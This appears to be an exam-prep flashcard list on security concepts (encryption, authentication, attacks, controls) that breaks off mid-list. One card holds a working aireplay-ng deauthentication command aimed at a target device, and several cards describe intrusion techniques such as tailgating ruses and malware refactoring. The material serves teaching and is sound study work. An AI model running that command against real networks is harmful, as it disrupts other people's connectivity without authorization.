Uses SSL/TLS over tcp 443 to run from a browser or a light VPN client to other VPN devices across many OS. Almost no firewalls issues. No VPN clients, digital certificates or shared passwords (like IPSec) required

How is NFC used as an identity system?

Uses access token in phone to identify yourself

how does DNSSEC add authentication and integrity?

Uses public key cryptography: DNS records are signed by a trusted third party. Signed DNS records are stored in the DNS that can be compared to received digital signatures.

Secure Honeynet Topology

Using many honeypots to attract bad guys.

How a botnet is usually installed

Usually installed by email link, Trojan horse or vulnerability in the OS or an application.

Online CA

Usually the intermediate CA that distributes the load of issued certificates.

(Digital certificate) Extensions (4 eg)

V3 certificates can be defined with extended attributes, such as friendly subject or issuer names, contact email addresses, and intended key usage.

Logical Segmentation (3)

VLANs logically separate Networks on one switch. Need a router to connect them.

Data owner examples (2)

VP of Sales owns the customer relationship data. Treasurer owns the financial information

Off-site backups (3)

Vaulting. E-vaulting. can be organizationally owned or 3rd-party.

Parties that have access to extranets

Vendors, suppliers

DNSSEC (3)

Verifies responses: Origin authentication. data integrity

Digital certificate fields (8)

Version, Serial Number, Signature Algorithm, Issuer, Valid From / Valid To, Subject, Public Key, Extensions

VMI stands for?

Virtual Mobile Infrastructure

Security CASB provides (4)

Visibility- see who is using what apps. Compliance. Threat prevention. Data security- encryption and DLP

Problem with WEP

Vulnerabilities found with RC4 ciphers and initialization vectors

Embed system vulnerabilities (2)

Vulnerabilities in every day devices that have OS which users don't have access to and are rarely to never updated. Most of them have internet access making them convenient for hackers

firewalls that block SQL injection

WAF

deprecated algorithms examples (2)

WEP DES (56 bit keys)

examples of Weak security configurations (5)

WEP, had vulnerable RC4 and IV. WPA. DES, 56 bit keys. 3DES, SHA1 had hash collisions

(WPA-)Enterprise aka

WPA-802.1x

(WPA-)PSK (2)

WPA2 with a preshared key. Everyone uses the same 256-bit key.

High availability security

Watch for single points of failures.

Development life-cycle models (2)

Waterfall. Agile

service account examples (2)

Web server, database server, etc

Server OS examples (2)

Web server. Database server

Things to separate with Distributed allocation (5)

Web servers. Database servers. Middleware. security devices. monitoring systems

Location of logs for DEP

Windows Event Viewer

OS Update options (8)

Windows Update. Windows Server Update services (WSUS) from a central console. Mac OS- Software Update, App Store. Linux- yum, apt-get, rpm, graphical front-ends

Windows OS Update options (2)

Windows Update. Windows Server Update services (WSUS) from central console

Kerberos

Windows network authentication protocol that uses SSO to gain access to everything, no need to re-authenticate.

Group Policy (2)

Windows policies that allow you to provide administrative and security rules to the OS of all systems globally. linked to AD administrative boundaries.

Examples of Role-based access control uses

Windows uses it in Windows Groups

OS that support Secure Boot (5)

Windows. Linux Fedora. openSUSE. Ubuntu. Apple uses their own EFI implementation

WPA2

Wireless encryption protocol that used AES for data confidentiality and CCMP for authentication and access control.

Peripherals security can be applied to (7)

Wireless keyboards. Wireless mice. Displays. WiFi-enabled MicroSD cards. Printers/MFDs. External storage devices. Digital cameras

Secure Wireless Topology (2)

Wireless work network that: should be internal and separate from guest networks. have secure authentication.

LDAP standard

X.500 standard

How to get back the original plaintext from an XOR ciphertext?

XOR the ciphertext again with the same key.

Non-persistent (reflected) XSS attack (3)

XXS attack that allows script to be injected in website input/search boxes that would be emailed as links to victims. The script would perform functions like sending credentials, session IDs or cookies to the bad guys. The script embedded in the URL executes in the victim's browser window.

Directional antennas examples (2)

Yagi, parabolic

On-premise (infrastructure) (2)

Your servers are in your data center. All applications are on local hardware

split knowledge

a Separation of duties where no one person has all the details

Raspberry Pi 3 (2)

a SoC controlled by a Broadcom BCM 2837 chip. Has a controller unit (chip) for the USB and Ethernet interfaces.

Vulnerability and Penetration testing authorization

a best practice since this removes all legal liability from testing. can determine how invasive you are allowed to be.

Certificate chaining (2)

a chain of trust listing all certs between the server and the root CA. starts with SLL certificates, then chain certificates, and ends with Root CA certificate

Exit interviews (2)

a common tool used by HR to gather statistics and track changes. Its a formal process and statistical record keeping.

Snapshots (2)

a complete backup of an OS during a specific date and time. can be taken by the hypervisor in a virtual environment.

Waterfall development model

a development model that follows sequential design process

Agile Development Model (3)

a development model where allot of tasks are performed at once to get code created as quickly as possible to have a starting point. involves customer collaboration. can make changes very quickly.

AUP

a document signed by users that identifies what is and isn't appropriate on a organization's network.

False Positive on IPS

a false alarm or mistaken identity of an intrusion.

DEP

a function in certain OS that sets aside sections of memory for executable software to run

Dictionary attack (2)

a method to determine passwords by using common words first. most common word lists online

How to update an immutable system?

a new iteration has to be deployed.

Salt

a nonce that randomizes a password hash.

Order of restoration (2)

a predefined list by the organization management of applications and their priority to be restored. priority may change during different parts of the year.

Open proxy (e.g)

a proxy owned by a third party commonly used to circumvent existing security controls. e.g. get around URL filtering.

Reverse proxy (2 eg)

a proxy that takes inbound traffic from the internet to internal services usually a server or multiple servers

Evil twin (2)

a rogue access point configured exactly the same way as an existing network. can overpower the existing access point and have all users connect to the bad guy's access point.

Dual control

a separation of duties where both people must be present to perform a business function

Standard operating procedure

a set of step-by-step instructions compiled by an organization to help workers carry out complex routine operations

Secret algorithm (2 def)

a shared symmetric key that needs to be replaced if discovered. algorithm that is kept private which is discouraged since experts can't test for flaws or weaknesses.

UEFI/BIOS

a standard implementation in manufacturer's hardware that connects computer's firmware and OS.

password length

a strong password is at least 8 characters.

Phishing

a technique to gain personal information through social engineering and/or spoofing.

Code quality and testing: Sandboxing

a test environment that that looks and works exactly like production environment.

Application cells/containers

a virtualization space that uses just the right resources to run an application instead of launching an entire VM.

Macro virus

a virus that are part of macros associated with documents like spreadsheets or word processing applications.

Heartbleed

a vulnerability discovered in April 2014, where an OpenSSL flaw put the private key of affected web servers at risk.

False positive

a vulnerability identified that doesn't exist

nikto

a vulnerability scanner designed to scan and find info on web servers

Platforms, networks and OS RADIUS supports (3)

a wide variety of platforms and devices. available on almost any server OS. on anyone's network, not just dial-in.

Disassociation (2)

a wireless attack that removes a wireless device from the network by taking advantage of 802.11 management frames and their lack of encryption and authentication. sends a constant wave of disassociation frames to a device

BPA

a written agreement that details the relationship between business partners, including their obligations toward the partnership.

EMI leakage

ability to listen in on EMI emissions on different devices to recreate user keystrokes, video, etc.

Rogue access point (2)

access points plugged in to a network to bypass authentication. Can also be enabled by wireless sharing in an authenticated OS.

shared account

account that can be used by more than one person

service accounts

accounts used exclusively by services running on a computer

Privileged accounts (2)

accounts with elevated to complete access to one or more systems. Often used to manage hardware, drivers, and software installation

Provisioning application software security

add security components to OS, application

DLL injection

adding malicious library, and manipulating OS or application to reference the library and bad guy's code.

context-aware authentication (3 eg)

adding or combining context for additional authentication: where you normally login. (IP) where you frequent. (GPS info) devices normally paired with (Bluetooth). and others

"Noah's Ark" of networking

adding pairs of systems and devices to maintain the uptime and availability

Continuing education (security procedures)

additional training as security environments change.

SRTP (2)

adds AES to encrypt voice/video flow. adds HMAC-SHA1 to add authentication, integrity, and replay protection

Refactoring examples (7)

adds NOP instructions, Loops, pointless code strings, reorder functions, modify application flow, reorder code and insert unused data types

Infrastructure as code security

adds cloud based security tools by automation along with the infrastructure devices.

Role-based access control (2)

administrator provides access based on the role of the user in the organization. additional rights implicitly given to groups within groups.

example of Privileged accounts (2)

administrator, root

Who adverse actions affect

affects applicants and can affect existing employees

How to check integrity of a file downloaded online

after download take a hash of the file and compare to online posted hash value.

CSR

after the creation of a key pair, the sending of the public key to the CA to be signed.

SLA

agreement between two parties that dictates the minimum level of services would be required

Disassociation command

aireplay-ng -0 100 -a BSSID of WAP -c Mac Address of target wlan0mon

DEP aka for AMD (2?)

aka Enhanced Virus Protection, (NX) no-execute page-protection

SCADA aka

aka ICS

DEP aka

aka No-eXecute bit

SLL offload aka

aka SLL termination

DEP aka for Intel

aka XD bit (eXexcute Disable)

Disassociation aka

aka deauthentication

low-severity vulnerability aka

aka informational/low priority vulnerability

access violations aka

aka segmentation fault

Session Hijacking aka

aka sidejacking, cookie hijacking

server-side validation

all checks of data occur on the server.

Incremental Backup Recovery process

all incremental backups since the last full backup and the full backup

Active/active load balancing

all servers are active and load balancer can use any of the servers at any time. (Round robin and affinity are referred to this type)

What updates are required for a newly installed OS?

all service packs and security patches

How HIDS/HIPS protects a system

allow/deny traffic based on signatures

NFC (4)

allows 2-way close wireless communication. used in payment systems. bootstrap for other wireless like Bluetooth pairing. Uses access tokens usually builtin to our mobile devices for encrypted payments

Single sign-on

allows access to everything on a network with a single authentication.

NTP

allows all devices to automatically sync their clock with an accuracy of better than 1 millisecond apart if sync on local time source

VM escape vulnerability

allows bad guys to break out of VM containers and interact with the host OS or hardware.

WiFi Direct/Ad hoc security concerns

allows bad guys to more easily connect to users

Corporate-owned deployment model Security

allows corporate data to not mix with personal

camera systems (2)

allows for 24/7 monitoring in home or office. These days recorders and camera communicate through TCP/IP

Cloud (Infrastructure) (2)

allows for entire application instances to be created and torn down on-demand. resources are available as needed (so you don't have to pay for extra hosting and time)

Push notification services

allows information to be pushed onto a mobile device screen without input from the user

SNMPv3

allows management of network devices that includes: confidentiality. Integrity. Authentication

Mobile Device Hotspot/tethering (2)

allows phone to become a wireless router for other devices. may require additional charges and data costs from provider

host availability (eg)

allows the implementation of cloud elasticity to build up and scale down lots of resources e.g. new server deployed with few mouse clicks.

SDN

allows to orchestrate and automate everything done in the networking environment.

Hypervisor (2)

allows virtualization. allocates memory, CPU, security and other resources required for VMs.

ad hoc mode

allows wireless devices to be manually configured to connect directly to each other without an AP.

WiFi Direct

allows wireless devices to use a discovery method to connect directly to each other without an AP

Capture system image security (5)

allows you to manipulate a copy of drive data without effecting original. use a bootable device to make a copy without effecting drive. remove the physical drive to prevent data overwrites. hardware write blocker can let you read but not write to a drive. data may be backed up on tapes

How to properly add Remote wipe function to a device (3)

already enabled when you add a device to an MDM. make user agree to policy when adding. or configure it using a set of credentials

Data-in-use concerns

always decrypted so CPU can use it. bad guys can pick the info out of RAM

Site-to-site VPN tunnel(2)

always on tunnel some disable the tunnel after certain amount of non-use and rebuild once new traffic passes

Forward proxy (2)

an "internal proxy" commonly used to protect and control user access to the internet. Provides URL filtering (disallowing visiting some sites)

Trusted OS (2)

an OS that is EAL compliant. EAL4 is the most accepted minimum level. (EAL7 the highest)

Adverse action (2 def)

an action that denies employment based on the background check. can also deny employment, credit, insurance, or some other benefit, due to consumer, credit, or criminal history.

Birthday attack

an attack that discovers collisions through brute force that can also be used to match a different hash being used for validation

Known-plain text attack(KPA) (2)

an attack where attacker has encrypted data and some of the plaintext referred to as the crib that may determine what the rest of the plaintext is. or determine the encryption/decreyption method, secret keys, etc.

RADIUS

an authentication protocol that centrally authenticates for many different systems across the network.

Impact: Reputation

an event can cause status or character problems

pass the hash

an exploit in which an attacker steals a hashed user credential and, without cracking it, reuses it to trick an authentication system into creating a new authenticated session on the same network.

Object identifiers (OID) (2)

an identifier mechanism for naming any object, concept, or "thing" with a globally unambiguous persistent name. standardized by the International Telecommunications Union (ITU) and ISO/IEC.

Tailgating and ways (3)

an unauthorized individual enters a restricted-access building by following an authorized user. Dress like a common 3rd-party. do smoke breaks with employees try walking in with hands full of donuts

Directional antennas (2)

antennas that allow you to focus signals in a single direction to go longer distances. Performance measured by dB gain. dB is doubled every additional 3 dB

Mission-essential functions examples (4)

any functions to keep the business running: payroll. accounting function. manufacturing facility.

Incident analysis resources

anything that helps understand what the normal operating is of the environment

code signing (3)

application code is signed by the developer's private key. A trusted CA signs the developer's public key. provide integrity and confirms who publisher was.

third-party libraries and SDKs concerns and security (2)

application features vs. unknown possibly insecure code base. (application development speed vs security) need to test library security.

Banner (3)

application information that tells everything about itself. used to communicate between the client and server so everyone knows who's communicating with who. Its usually invisible to users and behind the scenes.

Code signing certificate

application is digitally signed by the developer.

ASLR (2)

application would execute in different places in memory at different times. prevents a buffer overrun at a known memory address

Ways host-based firewalls can restrict traffic

application, tcp/udp port number

Immutable systems

applications (services or even images?) that can't be modified after being deployed into production.

Privileged user examples (3)

area manager. someone who creates reports from data. someone who handles user and password changes.

Key strength security

as our computing powers grow, these have to be larger and larger.

Key management life cycle: certificate generation

associate a key to a user or device

RSA

asymmetric algorithm that uses two large prime numbers

what kind of encryption does code signing use?

asymmetric encryption

Email Incident Category

attack executed from an email or attachment

Downgrade attack

attack that forces the systems to use weaker security.

Persistent (stored) XSS attack

attack that lets bad guys store a script on a file or message and anyone who views the page will be infected with that script

(WPA-)Enterprise

authenticates users individually with an authentication server

Unencrypted credentials (2, 4 eg)

authentication done in cleartext, unencrypted. don't send with unencrypted protocols either: Telnet, FTP, SMTP, IMAP

Somewhere you are

authentication factor based on geographical location.

Something you are (2)

authentication factor that usually uses biometric authentication stored in a mathematical representation.

Something you have

authentication factor you carry with you.

PAP

authentication found in legacy OS that communicates in the clear

things static code analyzer can't find (2)

authentication issues. insecure cryptography.

CHAP (3)

authentication protocol that was encrypted and authenticates using a three-way handshake. challenge-response occurs periodically behind the scenes during connection.

TACACS+

authentication protocol that was released by Cisco as an open standard.

WiFi-enabled MicroSD cards security concerns (2)

authentication vulnerabilities easy to exploit over WiFi. 3rd party can write an application to access API resulting in data leakage or data loss.

stress testing options (2)

automate existing individual workstations. simulate large workstation loads.

Disablement (3)

automatic result when too many failed login attempts. can also be forced by administrator. better this then deleting since important data could be lost.

fuzzing options (3)

available in different platforms and languages, etc. CERT Basic Fuzzing Framework (BFF)

MTTR

average time to restore a system once it fails

Proper error handling security

avoid default messages, write own error messages.

differential backup

backup that copies all files since the last full backup

Incremental backup

backup that copies all files since the last incremental backup.

Advantage of Key stretching

bad guy would have to brute force each hash spending allot of time.

Geolocation security concerns

bad guys can track you and your phone.

Principles of social engineering: Intimidation (ie)

bad things may happen if you don't help, payroll checks won't be processed, etc.

Content switching

balance applications differently between servers

Moat is an extreme example of?

barricades/bollards

counterintelligence gathering

based on data gathered on the attacker try to determine: what or who they are. attacker's habits that can identify them later

fighting shoulder surfing (2)

be aware of surroundings Privacy filters

Strategic intelligence/ counterintelligence gathering: Active logging

best practice is to log as much info as you can. This will have tracked every step attacker took (log everything, don't just automate increased logs when attack starts)

shared accounts security

best practice not to use these accounts

Backup utilities best practices

best practice: complete coverage, fast recovery

Best choice for removing Malware from a system

best recovery is to delete and restore from a good backup

AP signal strength security (3)

best to set as low as possible to limit signal to just inside the building. testing and study may be required. Consider receiver: High-gain antenna can hear more

black box

blind pentest where tester knows nothing about the systems and has to build maps and logically figure out what types of system there are

CTR (counter) (3)

block cipher mode that acts like a stream cipher. a counter and nonce (IV?) is encrypted then XORed by the plaintext. plaintext can be any size since its part of XOR i.e. 8 bits for streaming.

Faraday cage

blocks electromagnetic fields.

Asymmetric algorithm generation (2)

both keys are created at the same time using randomization, prime numbers, etc. Public key is made public and private key is kept private.

MOA example

both sides agree to promote and support the joint use of their facilities (is an example of)

Zeus/Zbot malware (2)

botnet malware used to clean out bank accounts. commonly combined with Necurs rootkit for hard detection and removal.

DNS amplification DDoS

botnets receive commands to send requests to open DNS resolvers for large DNS keys or other large info. they spoof the sender of the request as their target instead of themselves.

switches

bridges traffic in hardware known as ASIC forwards based on MAC addresses

Attrition Incident Category example

brute-force attacks

things static code analyzer can find (2)

buffer overflows. database injections

traceroute

builds a router map from one device to a destination. (tracert on windows)

Sensors (2)

built-in into devices to gather metrics. integrated into switches, routers, servers, firewalls, etc.

Mobile Device Payment methods (3 standards)

builtin function that uses NFC to pay with phones. Apple Pay Android Pay Samsung Pay

(Backup) Location Selection: legal implications (2)

business regulations vary between states. personnel must have passports and clear immigration if site outside the country.

Personal email security policies (4)

business use or a mix of business and personal. prohibit disruptive or offensive use. compliance issues. document organisation's definition of personal email e.g. Google Mail

Advantage of change management for risk management (2)

by implementing it: more uptime and availability. decreases risks to entire organization

Cable locks security concerns

cable can be cut so its a short term solution.

Mirai botnet examples (4)

cameras, routers, doorbells, garage door openers, etc

How does Orchestration aid in provisioning? (2, eg)

can automatically add or remove application instances based on whats needed e.g. during night. can add or remove security as well

Key escrow reasons

can be a legitimate business arrangement.

Are Smart cards contact or contactless?

can be both

Signal strength on an AP

can be configured based on how much power is used by the AP

Record time offset (5)

can be done directly from the OS. kept in Windows Registry. document time zone, daylight saving time and any other time change information.

shoulder surfing (methods 3)

can be done with webcams or binoculars, reflections off windows

pseudo-random number generation issues

can be duplicated if the same starting seed is used

PKCS #12 security

can be password protected since it transfers a private key

how is Infrared used? (2)

can be used for file transfers and to control devices that are IR accessible

printer/MFD security concerns (3)

can be used for reconnaissance i.e. log files for all activity, address books for who received a fax. can print without authentication if security circumvented. may retrieve copies of printed documents from spooling files.

Mobile Device Payment methods security concerns

can be used maliciously if authentication is bypassed

Version control security concerns

can be used to see previous version of confidential data even if current version deleted.

RPO examples (2)

can bring the system back online with a minimum amount of a few days worth of data but can't access a year's worth of archives. can bring a system online but provide availability only to a certain group of people.

capture video (for forensics) (3)

can capture video status on screen for forensics. also use security cameras. and phone

Injecting signals into EMI (2)

can change data captured on sensors. can input info into keyboard input.

Rooting/Jailbreaking security concerns (2)

can circumvent security features e.g. MDM policies. sideload apps without an app store

examples of Geofencing (2)

can disable cameras when inside the office. allow authentications if that device is in a particular area, prevent access if device located in a different country.

Application server secure configurations (3)

can disable unnecessary services. OS/security updates. limit file permission and access

PGP (3)

can encrypt and digitally sign email. asymmetric encryption (RSA) (and symmetric). used as commercial software. owned by Symantec.

Stored procedures concerns and security

can gain access to info in the database if SQL requests are modified by someone. Apps most secure if they don't use any SQL queries and only these.

How Network-based Firewalls act as Application-aware security devices

can identify traffic from Microsoft SQL server, Facebook, Twitter, YouTube, etc can be 1000s of applciations

What else can HIDS/HIPS detect? (eg)

can inform on activity in the OS. e.g. moved or modified file

Subscription services security (3)

can limit IP addresses where subscription might come from. set up certificates to establish trust. set up public key configuration for encryption.

how far can you limit access on an application server

can limit application server to only communicate to the database server and web server.

Display security concerns (2)

can reconstruct images on screen by listening to EM signals. no authentication or checks for firmware updates, can log info onto screen or ransomware.

TPM Versatile Memory (2)

can store encryption keys. can store configurations of current hardware to check for hardware changes over time.

Wearable technology IoT security concerns (3)

can track our location, where is that data stored? who has access to that data?

Mobile Device External media security concerns

can transfer data from a computer using a mobile device using SD flash memory, USB/lightning drives and walk it out of the building

HVAC security concerns

can turn off air conditioning or heating to make temperature too uncomfortable to work, DoS.

Viewing and converting different file formats (2)

can usually convert between file formats. OpenSSL and similar applications can read and display the certificates in many different formats

Where can you find Patch management tools on Windows?

can view in control panel > programs or all control panel items > programs and features > Installed Updates

Faraday cage security and concerns (2)

can't block all signal types. blocks mobile calls so have emergency call contingency.

Perfect forward secrecy security

can't decrypt traffic with private keys.

WiFi mobile security concerns (3)

capture data. MITM. Frequency interference from 2.4/5 ghz

tcpdump (3)

capture packets from the command line in Unix/Linux OS, available for Mac OS X. apply filters, view in real-time. (saved in pcap format so it can be loaded in a protocol analyzer later)

WinDump (3)

capture packets from the command line in Windows. apply filters, view in real-time. (saved in pcap format can be loaded in a protocol analyzer later)

Screenshots (for forensics)

capture the state of the screen

Banner grabbing

capturing a banner using Netcat, Nmap, telnet, nc, etc to view the application info: Name, version of software, server, etc

VDI development (ie)

centralized app development: no need to write application for different platforms, write application for one platform and any one who access it with ( ) has access to the app.

How can you tell what traffic was allowed on a host-based firewall?

centralized log shows what traffic was allowed or blocked

Containment of an incident concerns

certain malware monitor for connectivity and if connection is lost they delete, encrypt or damage everything.

User certificate

certificate associated with a user that acts as an additional authentication factor

(OCSP) stapling (2)

certificate holder verifies own status instead of CA. CA digitally signs the status info.

USB token

certificate on USB device

Smart card security (2)

certificate on the card identifies cryptographically. used with MFA like PIN or fingerprint.

Wildcard domain

certificate that applies to all server names in a domain.

SAN (3)

certificate that support many different domains. extension to an X.509 certificate. lists all additional DNS names associated with the cert

Machine/computer certificate (3)

certificate used to authenticate a devices onto a network. Can be checked on a VPN connection. management software can validate end devices.

Intermediate certificate aka

chain certificate (aka)

Ephemeral keys best practices (2)

change once a day or multiple times a day. need to be unpredictable random values.

MAC spoofing

changing MAC address allowed by most drivers.

Refactoring (2)

changing how malware looks every time it's downloaded to bypass signature-based antivirus. process of changing a software system in such a way that it does not alter the external behavior of the code yet improves its internal structure.

barricades/bollards

channel people through specific points and prevent larger objects from passing through

Web server secure configuration (4)

check and secure: Info: Banner info, directory browsing. permissions: web server running from a non-privileged account, file permissions properly configured. Configure SSL. Log files

Memory management security (3)

check and validate all user data input. make sure data going into memory matches buffer sizes. double check built-in functions of programming languages.

Data exposure security

check every step of all input and output processes.

Provisioning when deploying software to workstations (2)

check for malicious code. verify security of the workstation.

Why would you try wireless attacks on your own network?

check if your AP are susceptible to such attacks like rouge AP and deauthentication attacks etc

(Account management) Usage auditing and review

checking how resources are being used and stored, and if the systems and applications are secure.

(Account management) Permission auditing and review

checking that every one has the correct permissions. often done with scheduled recertification

(Account management) Time-of-day restrictions

checking whether some one is in certain area or accessing certain resources during times those areas and resources shouldn't be accessed

sfc /scannow (2)

checks and repairs core OS files. Provides a log of all the things that pass and that were repaired

File integrity check

checks if malware has modified the core OS and repairs if it has.

Configuration compliance scanner and other ways it is implemented

checks to see if devices meet minimum security configurations that comply with internal requirements for an organization or industry regulations. May be an ongoing audit: monitors changes, can integrate with login process or/and VPN connection

HIPAA non-compliance penalties (2 listed)

class 6 felony Fine up to $50,000 or up to 1 year in prison. Class 4 Felony up to 250,000 and/or up to 10 years in prison.

private data aka (3)

classified. restricted. Internal use only

difference between clear text and plaintext

clear text is readable data transmitted or stored "in the clear". (unencrypted) plaintext is input put into a coding process to create ciphertext.

SSO process with Kerberos

client sends a ticket granting ticket (TGT) to a KDC or ticket granting service. KDC provides the client the service ticket. Service ticket is used to authenticate to all the other services on the network

Types of Alarms (3)

closed or open circuits. Motion detection. Duress- trigger by person.

Air system HVAC takes advantage of (2)

closed-loop recirculating and positive pressurization system. Internal air is recycled and additional air is pushed out, preventing outside contaminants

Infrastructure as code

cloud-based network devices (and technology stacks) that are deployed by automation based on what application need.

compiled code (4)

code where: the source code is unseen. the application is an executable complied from the source. it's for a very specific OS and CPU. during compilation logical bugs can be identified.

Race conditions

coding problem that doesn't take into account of multiple things happening simultaneously.

ECDHE

combination of ECC and Diffie-Hellman Key exchange.

Secure NAT Topology (2)

combined with a stateful firewall for security. alone its not a security mechanism. (bad guy know how to circumvent)

HMAC (2)

combines a hash with a secret key. provides data integrity and authenticity.

GCM (2 def)

combines counter mode with Galois authentication. provides data authenticity (integrity)

Geofencing

combines geolocation and MDM policies to restrict or allow features when in a particular area.

DSA uses on mobile devices

combines with elliptic curve cryptography (ECC) to create ECDSA for minimal resource use.

netstat -b

command: shows active connection and windows binary that was used to create that connection

netstat -a

command: shows all active connections on an individual machine

netstat -n

command: shows all active connections on an individual machine without the resolved names, only IP addresses

arp -a

command: view table with MAC to IP addresses, ARP table

What is pass the hash commonly associated with?

commonly associated with the Microsoft NTLM protocol.

BPA commonly found

commonly seen between manufacturers and resellers

what devices commonly use USB OTG?

commonly seen on android devices

Preparation for an incident (5)

communication methods and who to contact. understand handling hardware and software. Incident analysis resources. Incident mitigation software. Policies for incident handling

COPE

company buys the device for the user to be used as both a corporate and personal device

XOR

compare 2 inputs when the bits are the same the output is 0, when they are different output is 1.

Hash uses (3)

compare store passwords without knowing what the actual password is. (confidentiality) verify document or download is the same as original. (integrity) digital signature (authentication, non-repudiation and integrity)

CBS stands for

component based servicing

pseudo-random number generation

computer generated that approximates true randomness using a starting seed number.

random number generation

computer generated that usually includes some type of natural input

removable media control concerns

concern of portable media like USB and portable drives from infecting systems or exporting data.

Mandatory Access Control Labels (4)

confidential. secret. top secret. etc

How to add encryption to a webserver?

configure SSL: manage and install certificates

Network Infrastructure Devices secure configurations (4)

configure authentication off a back-end known good database, with access for the system administrators. change defaults. Check with manufacturer for rare but important updates

OS secure configurations (4)

configure to automatically stay updated with latest patches. Delete and re-image compromised systems. changes go through change management. Perform regular integrity checks

Fighting Permission issues (3)

confirm permission on initial configuration. Have a process in place for changes and updates. perform periodic audits

Impact

considerations when building a business impact analysis.

Subscription services

constant automated subscription each with its own method of updating

Honeypot concerns

constant battle to discern real from fake

(Account management) recertification

constant checking that users have the correct privileges assigned to their account.

Continuous integration (3)

constant security checks during development as code is added on. bare minimum is a documented security baseline. Large-scale security analyze during testing.

Automation/scripting: Continuous monitoring

constantly checking for particular events to be able to automatically respond.

PKCS #12

container format for storing X.509 certificates in a single file. binary. often used to transfer a private and public key pair. (along with intermediate certs too) can be password protected

X.500 Directory tree objects (1, 3 eg, 1, 4 eg)

container objects e.g. country, organization, organizational units inside the container objects are leaf objects: Users, computers, printers, files.

Security of Security as a service (2)

continuous monitoring. anti-virus/malware constantly updated without deploying new updates.

Compensating (control)

control that doesn't prevent an attack up but restores using other means.

Detective (control) (2)

control that identifies and records any intrusion attempts. may not prevent access.

Technical controls (2)

controls implemented using systems to limit or prevent an event. OS controls

Administrative controls

controls that determine how people act

Physical controls

controls that physically separate people from our systems

Principles of social engineering: Consensus (ie)

convince based on what's normally expected Co-worker gave me this last week

Passive tap

copies signal and sends to analysis tool.

Capture system image (2)

copy the contents of a storage drive. done with software imaging tools.

code reuse

copying code from one application to another when there is a common process used in both applications and its easier then making code from scratch.

Mobile Device Camera use security issues (3)

corporate espionage, inappropriate use, very hard to control

Correlation engine (2)

correlates data gather together by collectors. Found on SIEMs.

reason for carrier locking (2)

cost of phone may come out of monthly payments. provider needs to recoup the cost of the phone.

examples of company assets AUP covers (4)

covers: Internet use, telephones, computers, mobile devices, etc

Key management best practice.

create a good set of policies.

Digital certificate creation process (4)

create a key pair, send the public key to the CA to be signed, CA performs checks to verify ownership of domain and web server, provides a digital signature and possibly some additional features

Key management life cycle: key generation

create a key with the requested strength using the proper cipher

Account management:On-boarding

create an account with proper permissions and access by adding them into their proper groups or departments.

what year was PGP created?

created in 1991

Blowfish history

created in 1993. One of the first secure ciphers not limited by patents.

Mesh trust model

cross-certifying CAs.

Master Image

customized image of an ideal server deployment which requires some configuration specific to the server being deployed.

Injection

data added by a user into a data stream where the application isn't checking the input and gets unexpected output.

VDI

data and application run on remote servers separate from the mobile device.

RFID attacks (4)

data capture: view communication, replay attacks Spoof the reader, write own data to the tag that is sent back to original device. Jam signal. default decryption keys on google

Open-source intelligence (OSINT)

data collected from publicly available sources to be used in an intelligence context

cloud storage

data is available anywhere, anytime, on any device with a network connection.

VDI security (2)

data is stored in a secure, centralized area. If a device is lost no data is lost along with the device.

Web server security concerns (2)

data leaks. server access

Email storage being required to be kept for years back is an example of?

data retention (example)

Data owner (2)

data role of someone accountable for specific data. often a senior officer

PII

data that can be used to identify an individual.

Data-at-rest

data that is on a storage device.

Proprietary data (2)

data that is the property of an organization. may also include trade secrets

Data-in-transit

data transmitted over the network

Injection examples

data types include HTML, SQL, XML, LDAP, etc.

private data (2)

data with restricted access. may require non-disclosure agreement to access.

(Account management) Off-boarding

deactivate the account rather than delete it since deleted accounts may delete important data.

Risk Mitigation (1, e.g.)

decrease the risk level e.g. by investing in security systems

service account security (2)

define access for specific services. determine best policy for password updates

what policies can be set by the MDM for failed password attempts? (3)

delete all the data. completely lock the phone and require input from security team to unlock. slow down the process to prevent brute force.

Blacksheep (3)

designed to combat firesheep, use to be used to monitor session ID traffic on Facebook. no longer valid since Facebook uses HTTPS.

ARP

determines the MAC address with the IP address

Network scanner (5)

determines what services and OS are running on a remote device. scan for open ports. scan an IP address or range of IP to identify many devices. Visually map the network. (eg Zenmap) Good way to spot a rogue system

IPS rules (4) (#, how customized) (what about them is most time consuming?)

determines what to do when certain vulnerabilities are found: Block, allow, sent alert, etc Thousands of rules Rules can be customized by group or individual rules Takes allot of time to make rules and sort out the noise and false positives

Secure coding techniques: obfuscate. and why?

developers take perfectly readable code and give user nonsense code that performs exactly the same as the original. make difficult to find security holes.

failing posture assessment (2)

device is sent to quarantined network with just enough access to fix issues. Once resolved retest

Wireless LAN controller (5)

device that centrally manages all WAPs. Deploys new AP. performance and security monitoring. configure and deploy changes to all sites. report AP use. Usually a proprietary system based on the AP being used

fuzzer

device that randomly sends info into the inputs of applications.

Proxy (useful for? 4)

device that sits between users and the external network, receives the user requests and sends the request on their behalf. Useful for caching, access control, URL filtering, content scanning, etc

Network Infrastructure Devices

devices that run behind the scenes that keep our networks running but user's don't directly interact with. (switches, routers, firewalls, IPS, etc)

modes of operation

different ciphers to chose from for block ciphers

shared accounts security concerns (3)

difficult to audit, know who was working. every one shares same resources. password management becomes difficult.

fencing security (3)

difficult to cut or knock over. High. Razor wire

password reuse (2)

difficult to do. systems remember password history and require unique passwords.

Disadvantage of change management for risk management

difficult to implement since formal process can slow down change process.

Screenshots security

difficult to reproduce, even with a disk image

BYOD security issues (2)

difficult to secure such a device: need to protect both types of data. need a policy for when a device is sold or traded

SoC Security

difficult to upgrade, usually replace entire hardware.

Which is more advanced dig or nslookup?

dig

Non-Repudiation Common use cases example

digital signature (example of this Common use case)

DSA is part of what and when was it added?

digital signature standard for FIPS since 1993.

Certificate Standard extension (9)

digitalSignature (0) nonRepudiation (1) keyEncipherment (2) dataEncipherment (3) keyAgreement (4) keyCertSign (5) cRLSign (6) encipherOnly (7) decipherOnly (8)

How would some one try to tap fiber?

direct taps

Parabolic antenna

directional antenna that has curved front that focuses the signals coming in to a single point, the feed horn.

Yagi antenna

directional antenna with high gain

Lockout

disable an account after too many incorrect password attempts.

Disabling unnecessary accounts in OS (4 eg)

disable guest, root, mail,etc. disable interactive logins for accounts used as services

disabling unnecessary services(2)

disable service not being used to limit vulnerabilities. requires allot of research.

Things to consider disabling for least functionality (4)

disable: printer installation. changing system time. taking ownership of file system objects. deny log on as a service

IEEE 802.1x (3)

disallows access until authentication process is complete. Used with an authentication protocol (eg PEAP) to access a centralized database (eg Radius)

Personnel issues: Social media

disclosing meaningful company info by post.

Physical taps (2)

disconnect a link, put this in the middle to capture data from the network. Can be active or passive

Deprovisioning

